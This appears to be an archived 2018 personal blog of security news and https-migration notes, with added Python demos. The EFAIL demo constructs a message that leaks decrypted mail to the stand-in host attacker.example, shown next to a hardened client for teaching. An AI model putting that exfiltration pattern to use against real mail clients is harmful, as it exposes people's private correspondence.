I find that if I restart the computer, it says it is active and will let me run a scan.  But the icon that says an update is being installed persists.  Of course, until the problem is resolved it cannot keep up with pattern updates.

The computer that I took with me and used every day (also Windows 10 with the same latest features update) does not now have this problem.

There are various threads on the Trend Micro Community site, dating back to early 2017, but I believe this could also have something to do with the period of non-use or recent Microsoft updates.
I’ll contact Trend Micro if I can’t get this resolved soon.

Update: June 12

A 90-minute support session, in which Trend applied several hotfixes, fixed the problem.  Not having logged on for 11 days was only part of the problem.  tmqa.jp and login.me were used so that the technician could work remotely.

Sunday, June 03, 2018

New hacking group could threaten industrial control systems

A hacking group called XENOTIME has attracted attention for its capacity to hack and shut down industrial plants, after it did so in the Middle East last year.  The threat was written up by Shannon Vavra in Axios here.

Dragos expanded on this with more details in a blog post here.

There could be dangers to water treatment plants, pipeline controls, and maybe some power plants.
But it is not clear how they would get into a system that is off the public Internet.  In practice, such intrusions usually start in the plant’s ordinary corporate IT network and then pivot into the control network through a connection that was supposed not to exist, rather than through the Internet directly.

The name is a mineral (xenotime); Dragos names its activity groups after minerals, not after Pokémon.

Wednesday, May 30, 2018

Big-time malware from North Korea can disrupt businesses, maybe hack sites and capture domain names

US-CERT has issued a technical alert (TA18-149A, with accompanying malware analysis reports) on two pieces of HIDDEN COBRA malware: the Joanap backdoor trojan, a remote access tool, and the Brambul Server Message Block worm; summary here.
These appear to originate from North Korea and have been found in networks across several sectors.  The description of the malware is exceptionally detailed.  Brambul spreads by brute-forcing Windows SMB logins with a built-in list of passwords, which is the “password cracker” part.

I am also aware of instances where a domain, perhaps one with political significance, has been hijacked and actually removed from registration after being replaced with malware bots.  This is likely to be foreign and might be related to North Korea.  I’ll report more details when they are available.  Trend Micro and Windows Defender have reported detecting this problem.

Friday, May 25, 2018

FBI needs home users to learn router administration skills to defeat determined foreign hackers

The FBI is warning consumers about malware, known as VPNFilter, that infects home and small-office routers (and some network-attached storage devices).
The Boston Globe has a typical story here.

Rebooting the router (from the power button, or by disconnecting and reconnecting the power) clears the malware's non-persistent stages, which is why the FBI asked everyone to reboot.  But a reboot does not reinstall firmware, and it does not remove the persistent first stage of this malware, so a reboot alone is not sufficient.
The FBI is encouraging home router users to learn how to sign on to their router's administration page and update it manually.  This normally means the router's web interface and its admin password rather than shell scripting: apply the vendor's latest firmware, change the default admin password, and turn off remote management if it is enabled.
Comcast, Cox, etc. will presumably have comments on this issue.

US Cert has a bulletin on the issue here

Sunday, May 20, 2018

Smart phone tracking and stalking a bigger problem than most people realize

Jennifer Valentino-DeVries has a long article in the New York Times Saturday on smartphone stalking and tracking, here.
There seem to be dozens of apps that make this possible, at least at short range.
The problem occurs most often in domestic abuse situations.
NBC Washington also presented a report May 17.  Fox stations have also reported it.

Saturday, May 19, 2018

Chrome will suppress "secure icon", simply call out insecure sites in September 2018

Google Chrome will drop its “Secure” label in September (Chrome 69) for sites accessed through https (that is, with a valid TLS certificate), while continuing to show the “Not secure” warning for sites that are not.

Marietta Moon writes for Engadget here.
Google wants https to be the unremarkable default and plain http to be the exception, even for pages that require no sign-in and collect no data, because on an unencrypted connection anyone on the network path (an ISP, a hotspot operator, a compromised router) can read or alter the page in transit, the “man in the middle” attack.

Monday, May 14, 2018

New concerns surface concerning vulnerabilities in email encryption standards

The Electronic Frontier Foundation has sent out an advisory about vulnerabilities (the researchers call them EFAIL) in the way many email clients handle PGP- and S/MIME-encrypted mail. The article is by Erica Portnoy, Danny O’Brien, and Nate Cardozo.

The attacks let someone who has already obtained copies of your encrypted messages (for example from a compromised mail server or a backup) trick your own client into decrypting them and sending the plaintext to a server the attacker controls, so old encrypted mail you have sent or received is at risk, not only new mail.
A lot of the public may not feel that this issue is as important as some others.  Most of us encounter encryption mainly through the TLS that protects our sessions with financial institutions when we buy products (like annuities) or go through real estate closings with a lot of DocuSign documents; end-to-end email encryption with PGP or S/MIME is used by a much smaller group.

One problem is that the leak can be triggered merely by opening the malicious email in a client that renders HTML and loads remote content, without opening any attachment: the attacker wraps the stolen ciphertext inside an HTML tag so that, once the client decrypts it, the plaintext becomes part of an image URL that the client then fetches from the attacker's server.

The IT departments of insurance companies and banks, which lean on S/MIME for regulated correspondence, will be kept especially busy.
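As an added example (my own code, not the EFF's and not the EFAIL researchers'), here is a simulation of the direct-exfiltration variant described above: a mail client that decrypts the encrypted MIME part and glues every part into one HTML document before rendering it, beside a client that renders each part on its own and does not load remote content. The cipher is a toy XOR stand-in so the file runs offline; real OpenPGP would behave the same way here, because the flaw is in the client's MIME handling, not in the cryptography (EFAIL's second, CBC/CFB-gadget variant is not covered). attacker.example is a placeholder host.

```python
from html.parser import HTMLParser

KEY = b"stand-in-key"  # assumption: toy symmetric key, not an OpenPGP key


def toy_encrypt(plaintext: bytes) -> bytes:
    """XOR stand-in for real encryption; enough to show where the plaintext ends up."""
    return bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(plaintext))


def toy_decrypt(ciphertext: bytes) -> bytes:
    return toy_encrypt(ciphertext)  # XOR with the same key stream is symmetric


class RemoteRefs(HTMLParser):
    """Collect every URL an HTML renderer would fetch for <img src=...>."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.urls.append(value)


def remote_urls(html: str) -> list:
    parser = RemoteRefs()
    parser.feed(html)
    parser.close()
    return parser.urls


def build_attack_message(stolen_ciphertext: bytes) -> list:
    """A message is a list of (content_type, body) MIME parts. The attacker sandwiches
    a ciphertext they captured earlier between two HTML fragments of their own."""
    return [
        ("text/html", '<img src="http://attacker.example/'),
        ("application/pgp-encrypted", stolen_ciphertext),
        ("text/html", '">'),
    ]


def decrypt_part(content_type: str, body):
    if content_type == "application/pgp-encrypted":
        return toy_decrypt(body).decode()
    return body


def render_vulnerable(parts, load_remote=True) -> list:
    """Decrypt each encrypted part, concatenate all bodies into ONE document, render it.
    Returns the URLs the client would fetch; the plaintext rides inside the image URL."""
    document = "".join(decrypt_part(ctype, body) for ctype, body in parts)
    return remote_urls(document) if load_remote else []


def render_hardened(parts, load_remote=False) -> list:
    """Render every MIME part as its own document and block remote content by default,
    so decrypted text can never be spliced into markup supplied by another part."""
    fetched = []
    for ctype, body in parts:
        text = decrypt_part(ctype, body)
        if load_remote:
            fetched.extend(remote_urls(text))
    return fetched


if __name__ == "__main__":
    # Constructed sample: a message the victim sent earlier, captured by the attacker.
    captured = toy_encrypt(b"wire 5000 USD to account 1234")
    msg = build_attack_message(captured)
    print("vulnerable client fetches:", render_vulnerable(msg))
    print("hardened client fetches:  ", render_hardened(msg))
```

The two mitigations EFF recommended map directly onto the hardened function: disabling remote content loading stops the fetch, and decrypting outside the mail client (or refusing to render decrypted output inside HTML from the same message) stops the splice.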

Thursday, May 10, 2018

Apple's new "Black Dot of Death": we need a fix quickly

There is a bug in iOS 11 versions on the iPhone that can cause the Messages app to freeze.  It is triggered by a message containing a “black dot” emoji followed by a long run of invisible Unicode characters that overwhelms the text renderer ("The Black Dot of Death").
On Android it only freezes WhatsApp. On the iPhone it freezes the entire Messages app.  It is rather complicated to fix.

It could be a real problem, for example, if you are waiting for a taxi and getting messages from the taxi company.  (I don’t think it affects Uber.)

A typical story is here.

It is a little unclear whether it freezes the entire phone or just the Messages app.  The message takes a long time to send.

The demonstrator says it is easy to recover by starting a new Messages conversation.  Fox8 in Cleveland says to use Siri to get past it.

The phone can overheat while sending or receiving the message.  Could this become an airline fire hazard?
Apple will surely fix this very soon.

Wednesday, May 09, 2018

Russian hackers impersonated radical Islam, harassed military spouses online as early as 2015, well before Trump's candidacy and election

There was an alarming historical story on AP by Raphael Satter about how Russian hackers had impersonated ISIS in text messages and other social media contact with military spouses, at least as far back as 2015.

At least one of the spouses was part of Military Partners, an association of partners of LGBT service members, active since the repeal of DADT and also since Obergefell.

But the attack appears to have been part of a Russian troll attempt to spread confusion and dissension, even well before the 2016 elections and even before Donald Trump had announced his candidacy. 
This story bears watching.

Tuesday, May 08, 2018

Phishing emails asking for payment for fictitious loans

Here’s a new one.  I don’t recall getting an email before about a loan I didn’t make.

But I got an email from “elastic.co” claiming I owe a $19 payment to “accounts receivables”.  There was an attached pdf which I didn’t open. The “.co” refers to Colombia, so that’s suspicious. 

I’ll probably pull credit reports in a few days to make sure there is nothing going on. 

I generally open “suspicious” emails only on the iPhone (Apple operating systems don’t seem to be as vulnerable) and don’t open the attachments at all.

“Elastic” does appear, from superficial checking, to be a real company that makes loans. I doubt this email came from them. But I did send this on to Webroot and to Trend Micro to check further.
I should also mention that I've gotten a few US mail letters offering $100,000 lines of credit (one of them was $500,000).  I've ignored them.  They've never shown up on a credit report.

Friday, May 04, 2018

Twitter's little password flip; what about Facebook employees and your profiles?

NBC reports both praise and scorn for Twitter: displeasure that a bug had written users' passwords, unhashed, to an internal log where employees could in principle have read them, but approval of the fact that the company disclosed it promptly and asked everyone to change passwords.
I changed my own on a Windows 10 computer, and it seemed that it started working automatically on my phone.

In IT workplaces, security teams started to implement “separation of duties” among employees in the late 1980s in mainframe environments: programmers normally did not have the right to update production files, but users did.  But the maturity to respect security protocols, which protect employees as well as data, was slow to develop with many people (apparently including Hillary Clinton).
There is a related issue of Facebook employees being able to access ordinary users' private profiles; Wall Street Journal story.
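Twitter's statement was that a bug wrote passwords to an internal log before the hashing step. As an added example (my own code, not Twitter's), here is a login handler with that defect next to one that hashes with salted PBKDF2 (a standard-library stand-in for the bcrypt Twitter uses) and redacts sensitive fields before writing the log line; the field names and the in-memory log are assumptions for the demonstration.

```python
import hashlib
import hmac
import json
import os

ITERATIONS = 200_000                      # assumption: PBKDF2 work factor for the demo
SENSITIVE = {"password", "new_password", "token"}   # fields that must never be logged


def hash_password(password: str, salt=None) -> dict:
    """Salted PBKDF2-HMAC-SHA256; the record is what should be stored, never the password."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"salt": salt.hex(), "digest": digest.hex(), "iterations": ITERATIONS}


def verify_password(password: str, record: dict) -> bool:
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(digest.hex(), record["digest"])   # constant-time compare


def redact(request: dict) -> dict:
    """Copy of the request with secret fields masked, safe to serialize into a log."""
    return {k: ("[REDACTED]" if k in SENSITIVE else v) for k, v in request.items()}


def login_vulnerable(request: dict, record: dict, log: list) -> bool:
    # BUG (the Twitter pattern): the raw request, password included, is logged
    # before the password ever reaches the hashing step.
    log.append(json.dumps(request))
    return verify_password(request["password"], record)


def login_hardened(request: dict, record: dict, log: list) -> bool:
    # Only the redacted view is logged; the plaintext exists just long enough to hash.
    log.append(json.dumps(redact(request)))
    return verify_password(request["password"], record)


def leaked_secrets(log: list, secret: str) -> int:
    """How many log lines contain the secret verbatim (0 is the only acceptable answer)."""
    return sum(secret in line for line in log)


if __name__ == "__main__":
    record = hash_password("correct horse")          # stored at signup
    vulnerable_log, hardened_log = [], []
    login_vulnerable({"user": "alice", "password": "correct horse"}, record, vulnerable_log)
    login_hardened({"user": "alice", "password": "correct horse"}, record, hardened_log)
    print("plaintext passwords in vulnerable log:", leaked_secrets(vulnerable_log, "correct horse"))
    print("plaintext passwords in hardened log:  ", leaked_secrets(hardened_log, "correct horse"))
```

The separation-of-duties point in the post applies here too: even with redaction, the people who can read production logs should not be the same people who can alter the code that decides what gets written to them.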

Wednesday, April 18, 2018

Russian router hacks could even target home and small business users

Dan Goodin, of Ars Technica, has a somewhat detailed account of the recent reports from DHS, the FBI and the UK’s National Cyber Security Centre that Russian state-sponsored targeting of network devices may well include small business and even some home office routers, link.
The story was released April 16 and was reported on WJLA (a Sinclair station) local news early Tuesday.
The Ars Technica story emphasizes that home users often run older firmware and do not maintain their routers.  Some commentators say that cable company routers should be restarted once a month, but a reboot does not by itself install new firmware; I find that cable companies usually force maintenance in the early AM hours (leading to brief outages).
But some observers see this report as sinister.  A compromised router sits in the path of all of a household's traffic and so can facilitate “man in the middle” attacks, which is part of the push for all websites (even those that require no login and sell nothing) to use https.  Such routers could provide ways for hackers to steal financial data or trade secrets or to stage novel terror-like attacks targeting ordinary people, although this doesn’t seem to have happened.  But the North Korean attack on Sony in 2014 might be a paradigm to follow.

Tuesday, April 17, 2018

More on fixing legacy webpages for https everywhere

Here is some more information on the progress to enabling https, at least on my domains.

On Blogger, the three custom domains automatically convert to https if you enter http.  The thirteen other blogs, which are plain “blogspot” addresses, simply accept https.  I suspect that Google will force these to redirect before July for the Chrome 68 implementation.

My four Wordpress custom domains through Wordpress all accept https.  They can be accessed with http, but will work with “Let’s Encrypt”.  Bluehost offers pingbacks when you make hyperlink references among these domains.  Pingbacks generated after the https certificates were implemented and propagated (as Positive SSL) become https.  Older pingbacks right now are still http.  If you want to review the pinged site you have to enter https yourself in the browser, then you can see it under SSL (I just tested it).  This is not ideologically perfect, but I suspect this will be OK in July.

I haven’t gone through the Wordpress blogs and converted all the internals to https, although there really aren’t that many, fortunately.  Right now the user can insert the https on older links.
Google’s link (mentioned April 1) recommends that users deploy an open-source tool called Lighthouse to “clean up” their web pages; among other things it flags mixed content, that is, http resources loaded by an https page.  This might take a long time for bloggers with a huge inventory of legacy pages, as I have.  Ramsay Tamplin (“Blogtyrant”) made similar recommendations with a different technique that I linked to here on November 13.

I have purchased a Positive SSL certificate for my Verio legacy doaskdotell.com domain.  So far it has not been propagated.  There is a massive number of hardcoded links within this very old site.  They could be changed by gang edits to relative links (as here).  I don’t think I will get to this right away, however.  I’ll keep everyone posted.

It is also worthy of note that Google Blogger will no longer publish posts with video embeds whose embed code uses http (as opposed to https) URLs.
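As an added example of the “gang edit” for hardcoded links (my own script, not a Bluehost, Google or Lighthouse tool), here is a rewriter that turns absolute http:// links to your own domains into relative links, upgrades http:// links to hosts you know serve https, and reports the remaining http:// links so you can check them by hand rather than blindly rewriting them. The host lists and the sample HTML are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Matches href="http://..." and src='http://...' (the attributes that cause mixed
# content when a page is served over https). https:// links are left untouched.
ATTR_URL = re.compile(
    r"""(?P<attr>\b(?:href|src)\s*=\s*)(?P<q>["'])(?P<url>http://[^"']+)(?P=q)""",
    re.IGNORECASE)


def rewrite_url(url: str, own_hosts: set, https_ready: set) -> str:
    """Relative link for our own hosts, https for hosts known to support it,
    otherwise the original URL (to be reviewed, not guessed)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in own_hosts:
        return urlunsplit(("", "", parts.path or "/", parts.query, parts.fragment))
    if host in https_ready:
        return urlunsplit(("https",) + tuple(parts[1:]))
    return url


def rewrite_html(html: str, own_hosts: set, https_ready: set):
    """Return (rewritten_html, unresolved_urls). Unresolved links are the ones a
    tool like Lighthouse would still flag as mixed content after the edit."""
    unresolved = []

    def replace(m):
        new = rewrite_url(m.group("url"), own_hosts, https_ready)
        if new == m.group("url"):
            unresolved.append(new)
        return m.group("attr") + m.group("q") + new + m.group("q")

    return ATTR_URL.sub(replace, html), unresolved


# Constructed sample page (assumption: doaskdotell.com is our own domain and
# cdn.example.net is a third party already verified to serve https).
SAMPLE_HTML = (
    '<a href="http://doaskdotell.com/movies/weiwei.html?ref=1#top">review</a>\n'
    "<img src='http://cdn.example.net/pic.png'>\n"
    '<a href="http://unknown.example/z">elsewhere</a>\n'
    '<a href="https://already.example/ok">fine</a>\n'
)

if __name__ == "__main__":
    out, todo = rewrite_html(SAMPLE_HTML, {"doaskdotell.com"}, {"cdn.example.net"})
    print(out)
    print("still http, review by hand:", todo)
```

Run it over a copy of the site first and diff the result; the unresolved list is the work that remains, and a host that does not actually answer on 443 should stay http (and be replaced or removed) rather than be rewritten to a broken https link.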

Friday, April 13, 2018

All my blog custom domains (Wordpress and Blogger) now have https enabled

I have updated all four (the three remaining) Wordpress blog domains and the three Google custom domains.
The Google domains were easy. You just check a box in settings for each corresponding blog, wait about an hour for propagation, and then check a second box to auto-convert all accesses to https.
For Bluehost Wordpress hosting, you can now do multiple domains within one cPanel.
One of the domains had minimal SiteLock protection, and that one took the free SSL certificate. Two others, which are newer, have SiteLock CDN (similar to Cloudflare). For these, you have to pay for Positive SSL (about $5 a month) and assign a new IP address to the domain (or remember to ask the support technician to do so; not everyone knows this yet).  You then wait for the new IP to propagate. You can check the progress of the propagation on “whatsmydns.net”.  It helps to reload it a few times; that seems to prompt progress.  The site will go to your BlueHost panel as a redirect or give database errors on https until the entire propagation all over the world is done.  During the propagation, it is possible for foreign servers, especially, to reject your IP address, but this will not prevent the rest of the locations from working.  There seems to be at least one server for every telecom company around the world.  There are many server sites in non-democratic countries.

I hope later that SiteLock will cause the automatic conversion to https to happen.  I am told it is supposed to.   
China blocked one of my domains (the movie reviews).  Maybe that’s retaliation for Trump’s tariffs, or maybe that’s because I had reviewed some films about dissidents (Weiwei).  I don’t think I threaten Xi Jinping’s being god-king for life.

I've noticed that Trend Micro, at least, does not automatically mark https versions of green http sites as green; it seems to view them as new domains.  This seems illogical. 

Sunday, April 01, 2018

Google Chrome orders publishers to get SSL on all their sites by July 2018, "or else"

Google is now advising web publishers that its browser Chrome will start marking every site served over plain http as “Not secure” from July 2018 (Chrome 68), as in this story.   Google's own link is here.
The Search Engine Journal offers analysis of Chrome's share compared to other browsers.  But it would be reasonable to wonder whether other browsers intend to do the same.

The story (with a sublink) offers a guide for migrating a Wordpress site.  This looks like a time consuming process, but many blog sites probably don’t use a lot of the features of concern. 
Google says that the conversion is important even for sites that don’t do ecommerce or require user login.  This seems debatable.  But one problem is that on an unencrypted connection any intermediary can insert ads (or even scareware) or illegal content into the page a user receives, and an antivirus product will not necessarily pick this up, since the injected content is indistinguishable from what the site sent.  It would be a good question whether Microsoft Windows 10, for example, could come up with other ways to disallow man-in-the-middle attacks; in practice only an authenticated, encrypted connection between browser and site rules them out.
Google first started talking about this in 2014, but the concern has really picked up since about the end of 2016.

There is a product called the Unified Communications Certificate (UCC), which GoDaddy, for example, explains here, covering multiple domain names in one certificate.  Comodo explains related concepts such as Multi-Domain SSL and Wildcard SSL here.  It appears as of this writing that such a product on BlueHost would still require separate cPanels for each domain, but I will check further into this.
I usually announce my own plans on a secured Wordpress “doaskdotellnotes” blog (it has https).  I would anticipate trying to have my other three Wordpress domains secured by the end of June 2018.

There is a lingering question on Blogger why Google custom domains (when equated to Blogspot blogs) cannot have these certificates.  Will Google change this before its new Chrome policy goes into effect?
See the notes at the end of the Jan. 8, 2018 post here